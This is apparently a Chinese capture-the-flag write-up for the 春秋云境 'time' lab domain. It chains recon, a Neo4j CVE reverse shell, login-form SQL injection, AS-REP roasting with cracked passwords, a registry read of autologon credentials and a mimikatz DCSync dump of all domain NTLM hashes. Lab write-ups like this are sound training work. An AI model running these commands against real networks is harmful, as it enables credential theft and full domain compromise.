春秋云境——time
0x01 信息收集
必不可少的信息收集。继续fscan+Tscanplus扫一扫看看有无信息。
PS S:\tools\渗透\信息收集> .\fscan.exe -h 39.99.155.162
┌──────────────────────────────────────────────┐
│ ___ _ │
│ / _ \ ___ ___ _ __ __ _ ___| | __ │
│ / /_\/____/ __|/ __| '__/ _` |/ __| |/ / │
│ / /_\\_____\__ \ (__| | | (_| | (__| < │
│ \____/ |___/\___|_| \__,_|\___|_|\_\ │
└──────────────────────────────────────────────┘
Fscan Version: 2.0.0
[2025-03-28 12:58:13] [INFO] 暴力破解线程数: 1
[2025-03-28 12:58:13] [INFO] 开始信息扫描
[2025-03-28 12:58:13] [INFO] 最终有效主机数量: 1
[2025-03-28 12:58:13] [INFO] 开始主机扫描
[2025-03-28 12:58:14] [INFO] 有效端口数量: 233
[2025-03-28 12:58:14] [SUCCESS] 端口开放 39.99.155.162:110
[2025-03-28 12:58:14] [SUCCESS] 端口开放 39.99.155.162:22
[2025-03-28 12:58:14] [SUCCESS] 服务识别 39.99.155.162:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.5 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.5.]
[2025-03-28 12:58:16] [SUCCESS] 端口开放 39.99.155.162:7687
[2025-03-28 12:58:16] [SUCCESS] 服务识别 39.99.155.162:110 =>
[2025-03-28 12:58:26] [SUCCESS] 服务识别 39.99.155.162:7687 =>
[2025-03-28 12:58:26] [INFO] 存活端口数量: 3
[2025-03-28 12:58:26] [INFO] 开始漏洞扫描
[2025-03-28 12:58:26] [INFO] 加载的插件: neo4j, pop3, ssh, webpoc, webtitle
[2025-03-28 12:58:27] [SUCCESS] 网站标题 https://39.99.155.162:7687 状态码:400 长度:50 标题:无标题
扫出了标志性的neo4j服务,我们上网找个CVE打一下试试。
0x02 CVE-2021-34371
先上一下neo4j网页端的7474端口看看。默认账密nro4j/neo4j直接登陆上去了。翻看后台查看到版本为3.4.18,尝试打一下。
使用类似的命令,将shell反弹到我们的VPS上并上MSF的后门。完成持久化后我们再继续查看靶机内部。注意反弹指令须使用特定的指令格式,尚不清楚成因。
0x03 内网探测
靶机上没有提权环节,但是flag提醒我们注意kerberos的认证流程。
neo4j@ubuntu:~$ cat flag01.txt
cat flag01.txt
██████████ ██
░░░░░██░░░ ░░
░██ ██ ██████████ █████
░██ ░██░░██░░██░░██ ██░░░██
░██ ░██ ░██ ░██ ░██░███████
░██ ░██ ░██ ░██ ░██░██░░░░
░██ ░██ ███ ░██ ░██░░██████
░░ ░░ ░░░ ░░ ░░ ░░░░░░
flag01: flag{22910265-6373-4516-92e6-8e540512a961}
Do you know the authentication process of Kerberos?
......This will be the key to your progress.
感觉会像是kerberoasting或AS-REP Roasting攻击手法。但是前者需要一个低权限账户、后者需要大量的账户名。毫无线索的情况下还是先搭建frp代理内网扫一下吧。C2框架一般都自带代理模块,但强烈不建议使用,自带的代理速度简直是一坨。
___ _
/ _ \ ___ ___ _ __ __ _ ___| | __
/ /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__| <
\____/ |___/\___|_| \__,_|\___|_|\_\
fscan version: 1.8.4
start infoscan
trying RunIcmp2
The current user permissions unable to send icmp packets
start ping
(icmp) Target 172.22.6.36 is alive
(icmp) Target 172.22.6.12 is alive
(icmp) Target 172.22.6.25 is alive
(icmp) Target 172.22.6.38 is alive
[*] Icmp alive hosts len is: 4
172.22.6.36:7687 open
172.22.6.25:445 open
172.22.6.12:445 open
172.22.6.12:139 open
172.22.6.25:135 open
172.22.6.12:135 open
172.22.6.38:80 open
172.22.6.38:22 open
172.22.6.36:22 open
172.22.6.25:139 open
172.22.6.12:88 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo
[*]172.22.6.25
[->]WIN2019
[->]172.22.6.25
[*] NetInfo
[*]172.22.6.12
[->]DC-PROGAME
[->]172.22.6.12
[*] OsInfo 172.22.6.12 (Windows Server 2016 Datacenter 14393)
[*] NetBios 172.22.6.25 XIAORANG\WIN2019
[*] NetBios 172.22.6.12 [+] DC:DC-PROGAME.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] WebTitle http://172.22.6.38 code:200 len:1531 title:后台登录
[*] WebTitle https://172.22.6.36:7687 code:400 len:50 title:None
已完成 11/11
[*] 扫描结束,耗时: 12.786706188s
38主机开了web服务。看看怎么个事。打开显示一个很典的登陆页面,很难不让人有SQL注入的欲望(樂)。跑sqlmap,发现秒通。那事情就很好办了。注入的原始数据包如下。
POST /index.php HTTP/1.1
Host: 172.22.6.38
Content-Length: 30
Cache-Control: max-age=0
Accept-Language: zh-CN
Upgrade-Insecure-Requests: 1
Origin: http://172.22.6.38
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.6533.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://172.22.6.38/index.php
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
username=admin*&password=123456*
注出来的mysql数据库结构如下,拿走flag后我们把admin表和users表都拿出来看一下。
[13:24:46] [INFO] fetching database names
available databases [5]:
[*] information_schema
[*] mysql
[*] oa_db
[*] performance_schema
[*] sys
[13:25:09] [INFO] fetching tables for database: 'oa_db'
[3 tables]
+------------+
| oa_admin |
| oa_f1Agggg |
| oa_users |
+------------+
admin表中只有一行数据,感觉不会直接蠢到给域Administrator的账密,那我们就把users表的用户名都薅出来,然后AS-REP Roasting一下。小技巧:在csv文件中选定列直接Ctrl+C就可以把单列数据薅出来。处理完后我们使用impacket套件,进行AS-REP Roasting。
┌──(root㉿kali)-[/home/kali]
└─# proxychains4 -q impacket-GetNPUsers xiaorang.lab/ -usersfile oa_users.txt -dc-ip 172.22.6.12
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
$krb5asrep$23$wenshao@XIAORANG.LAB:e48a29665bde5f25af6841d8b8bf0894$6fa941d0e520d22fe9d0ee8c67875bd3df0dc8cb9f2b0cf47c0de492190b2fbdde54c56023947e327751d5d51569b65f6c513b70c9b5bb941e18ef2463e940e31d5934235e946d3a3384e3c33cdbac27c04a17e7bdbeb05ce523c802ac11721b885897bb38c56edcbc91bcecd65d5ce610bdfde3a0d41f17ed1ff6ce61c5eef2a7e8a1b4fc1c251e1fc66d99d5f7417f57eca494e76e0b9dc727da093976cf0e57da00bea696aa8b274a6a6a526adc3eca6a84b60de5bb78d26059ce2267a7b1b4b33a3d028b6c47434afd2b9dc2a4b16b09ec993be969c6e4ced51086df0c1d03606d2d4699ebb5c954d7d5
$krb5asrep$23$zhangxin@XIAORANG.LAB:fcedfadbb2afa58cb25c095418d4b8b6$9d19a87a0e21d624dc0c64adeee62cacef8653c678715430d4430b04832effc458369bd3020e14d121a6887fe31a58395f2bd7fc1884afb143eaa6bbe31338cd5bb4ade8f9f3bdb0e313129f78464d8296edda03163b4042494fabb299607b4386ad657c275683966af645019aa7ec0e5bd0d9189f349ebec630f0e1d0c2f907455a771b3fd8726adf8d132600e23372f93c16a4eb8f21ae4442c6c2036f2eaa059d4313e65b9f1c77a8de6ee47c4282b4b168b4c71d02823682ae92769515122ec61e2b91443583165a8c21f4fe7d45f7463945141c4cf66314bf9e7a6e563760b93e81c04dea8e59a0b7c0
拿到后使用hashcat对应的模块Kerberos 5, etype 23, AS-REP 爆破,对应编号为18200.
$krb5asrep$23$wenshao@XIAORANG.LAB:e48a29665bde5f25af6841d8b8bf0894$6fa941d0e520d22fe9d0ee8c67875bd3df0dc8cb9f2b0cf47c0de492190b2fbdde54c56023947e327751d5d51569b65f6c513b70c9b5bb941e18ef2463e940e31d5934235e946d3a3384e3c33cdbac27c04a17e7bdbeb05ce523c802ac11721b885897bb38c56edcbc91bcecd65d5ce610bdfde3a0d41f17ed1ff6ce61c5eef2a7e8a1b4fc1c251e1fc66d99d5f7417f57eca494e76e0b9dc727da093976cf0e57da00bea696aa8b274a6a6a526adc3eca6a84b60de5bb78d26059ce2267a7b1b4b33a3d028b6c47434afd2b9dc2a4b16b09ec993be969c6e4ced51086df0c1d03606d2d4699ebb5c954d7d5:hellokitty
$krb5asrep$23$zhangxin@XIAORANG.LAB:fcedfadbb2afa58cb25c095418d4b8b6$9d19a87a0e21d624dc0c64adeee62cacef8653c678715430d4430b04832effc458369bd3020e14d121a6887fe31a58395f2bd7fc1884afb143eaa6bbe31338cd5bb4ade8f9f3bdb0e313129f78464d8296edda03163b4042494fabb299607b4386ad657c275683966af645019aa7ec0e5bd0d9189f349ebec630f0e1d0c2f907455a771b3fd8726adf8d132600e23372f93c16a4eb8f21ae4442c6c2036f2eaa059d4313e65b9f1c77a8de6ee47c4282b4b168b4c71d02823682ae92769515122ec61e2b91443583165a8c21f4fe7d45f7463945141c4cf66314bf9e7a6e563760b93e81c04dea8e59a0b7c0:strawberry
拿到账密后我们先不急着直接上RDP,尝试一下再来个Kerberoasting看看能不能扩大战果。跑一下impacket显示No entries found,那只能老实上RDP查看了。两个账户下都没有flag,且priv和groups内都无滥用的特权,那我们先查看一下此台电脑的用户登录情况,看看都有谁登陆过此台主机。
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
DefaultUserName REG_SZ yuxuan
DefaultPassword REG_SZ Yuxuan7QbrgZ3L
DefaultDomainName REG_SZ xiaorang.lab
查询注册表相关信息,来查看用户的登陆情况以及可能的默认账密&域名。拿到了yuxuan的账密,这下我们就拥有第三个账户的明文账密了。拿此用户上线一下,然后我们跑一下BloodHound查看域内结构,做下一步行动。
0x04 域内移动
通过Bloodhound分析一下域内结构。
发现了可疑点。yuxuan用户拥有域内Administrators组的HistorySID。查了一下HistorySID的作用:SID History是在域迁移过程中需要使用的一个属性。如果将A域中的域用户迁移到B域中,那么在B域中该用户的SID会随之改变,进而影响迁移后用户的权限,导致迁移后的用户不能访问本来可以访问的资源。SID History的作用是在域迁移过程中保持域用户的访问权限,即如果迁移后用户的SID改变了,系统会将其原来的SID添加到迁移后用户的SID History属性中,使迁移后的用户保持原有权限、能够访问其原来可以访问的资源。
那其实yuxuan用户就是域Aministrators组的成员。使用mimikatz打一下DCsync,拿到Administrator的NTLM hash就结束了。
Using 'C:\Users\Public\1.txt' for logfile : OK
mimikatz # lsadump::dcsync /domain:xiaorang.lab /all /csv
[DC] 'xiaorang.lab' will be the domain
[DC] 'DC-PROGAME.xiaorang.lab' will be the DC server
[DC] Exporting domain 'xiaorang.lab'
[rpc] Service : ldap
[rpc] AuthnSvc : GSS_NEGOTIATE (9)
1103 shuzhen 07c1f387d7c2cf37e0ca7827393d2327 512
1104 gaiyong 52c909941c823dbe0f635b3711234d2e 512
1106 xiqidi a55d27cfa25f3df92ad558c304292f2e 512
1107 wengbang 6b1d97a5a68c6c6c9233d11274d13a2e 512
1108 xuanjiang a72a28c1a29ddf6509b8eabc61117c6c 512
1109 yuanchang e1cea038f5c9ffd9dc323daf35f6843b 512
1110 lvhui f58b31ef5da3fc831b4060552285ca54 512
1111 wenbo 9abb7115997ea03785e92542f684bdde 512
1112 zhenjun 94c84ba39c3ece24b419ab39fdd3de1a 512
1113 jinqing 4bf6ad7a2e9580bc8f19323f96749b3a 512
1115 yangju 1fa8c6b4307149415f5a1baffebe61cf 512
1117 weicheng 796a774eace67c159a65d6b86fea1d01 512
1118 weixian 8bd7dc83d84b3128bfbaf165bf292990 512
1119 haobei 045cc095cc91ba703c46aa9f9ce93df1 512
1120 jizhen 1840c5130e290816b55b4e5b60df10da 512
1121 jingze 3c8acaecc72f63a4be945ec6f4d6eeee 512
1122 rubao d8bd6484a344214d7e0cfee0fa76df74 512
1123 zhaoxiu 694c5c0ec86269daefff4dd611305fab 512
1124 tangshun 90b8d8b2146db6456d92a4a133eae225 512
1125 liangliang c67cd4bae75b82738e155df9dedab7c1 512
1126 qiyue b723d29e23f00c42d97dd97cc6b04bc8 512
1127 chouqian c6f0585b35de1862f324bc33c920328d 512
1128 jicheng 159ee55f1626f393de119946663a633c 512
1129 xiyi ee146df96b366efaeb5138832a75603b 512
1130 beijin a587b90ce9b675c9acf28826106d1d1d 512
1131 chenghui 08224236f9ddd68a51a794482b0e58b5 512
1132 chebin b50adfe07d0cef27ddabd4276b3c3168 512
1133 pengyuan a35d8f3c986ab37496896cbaa6cdfe3e 512
1134 yanglang 91c5550806405ee4d6f4521ba6e38f22 512
1135 jihuan cbe4d79f6264b71a48946c3fa94443f5 512
1136 duanmuxiao 494cc0e2e20d934647b2395d0a102fb0 512
1137 hongzhi f815bf5a1a17878b1438773dba555b8b 512
1138 gaijin b1040198d43631279a63b7fbc4c403af 512
1139 yifu 4836347be16e6af2cd746d3f934bb55a 512
1140 fusong adca7ec7f6ab1d2c60eb60f7dca81be7 512
1141 luwan c5b2b25ab76401f554f7e1e98d277a6a 512
1142 tangrong 2a38158c55abe6f6fe4b447fbc1a3e74 512
1143 zhufeng 71e03af8648921a3487a56e4bb8b5f53 512
1145 dongcheng f2fdf39c9ff94e24cf185a00bf0a186d 512
1146 lianhuangchen 23dc8b3e465c94577aa8a11a83c001af 512
1147 lili b290a36500f7e39beee8a29851a9f8d5 512
1148 huabi 02fe5838de111f9920e5e3bb7e009f2f 512
1149 rangsibo 103d0f70dc056939e431f9d2f604683c 512
1150 wohua cfcc49ec89dd76ba87019ca26e5f7a50 512
1151 haoguang 33efa30e6b3261d30a71ce397c779fda 512
1152 langying 52a8a125cd369ab16a385f3fcadc757d 512
1153 diaocai a14954d5307d74cd75089514ccca097a 512
1154 lianggui 4ae2996c7c15449689280dfaec6f2c37 512
1155 manxue 0255c42d9f960475f5ad03e0fee88589 512
1156 baqin 327f2a711e582db21d9dd6d08f7bdf91 512
1157 chengqiu 0d0c1421edf07323c1eb4f5665b5cb6d 512
1158 louyou a97ba112b411a3bfe140c941528a4648 512
1159 maqun 485c35105375e0754a852cee996ed33b 512
1160 wenbiao 36b6c466ea34b2c70500e0bfb98e68bc 512
1161 weishengshan f60a4233d03a2b03a7f0ae619c732fae 512
1163 chuyuan 0cfdca5c210c918b11e96661de82948a 512
1164 wenliang a4d2bacaf220292d5fdf9e89b3513a5c 512
1165 yulvxue cf970dea0689db62a43b272e2c99dccd 512
1166 luyue 274d823e941fc51f84ea323e22d5a8c4 512
1167 ganjian 7d3c39d94a272c6e1e2ffca927925ecc 512
1168 pangzhen 51d37e14983a43a6a45add0ae8939609 512
1169 guohong d3ce91810c1f004c782fe77c90f9deb6 512
1170 lezhong dad3990f640ccec92cf99f3b7be092c7 512
1171 sheweiyue d17aecec7aa3a6f4a1e8d8b7c2163b35 512
1172 dujian 8f7846c78f03bf55685a697fe20b0857 512
1173 lidongjin 34638b8589d235dea49e2153ae89f2a1 512
1174 hongqun 6c791ef38d72505baeb4a391de05b6e1 512
1175 yexing 34842d36248c2492a5c9a1ae5d850d54 512
1176 maoda 6e65c0796f05c0118fbaa8d9f1309026 512
1177 qiaomei 6a889f350a0ebc15cf9306687da3fd34 512
502 krbtgt a4206b127773884e2c7ea86cdd282d9c 514
500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9 512
1000 DC-PROGAME$ 685aca112c0f5f29984f5b212c648d47 532480
1181 WIN2019$ acd83f0837bc0b4eebe2a28437e38d23 4096
1178 wenshao b31c6aa5660d6e87ee046b1bb5d0ff79 4260352
1179 zhangxin d6c5976e07cdb410be19b84126367e3d 4260352
1180 yuxuan 376ece347142d1628632d440530e8eed 66048
拿到了500 Administrator 04d93ffd6f5f6e4490e0de23f240a5e9,本靶机也就宣告结束了。
0x05 总结
中规中矩的一台windows域靶机,查看默认登陆帐密那块确实是个新思路。把域内最常见的几个手法锻炼了一下,没有什么难点和巧思,纯靠熟练。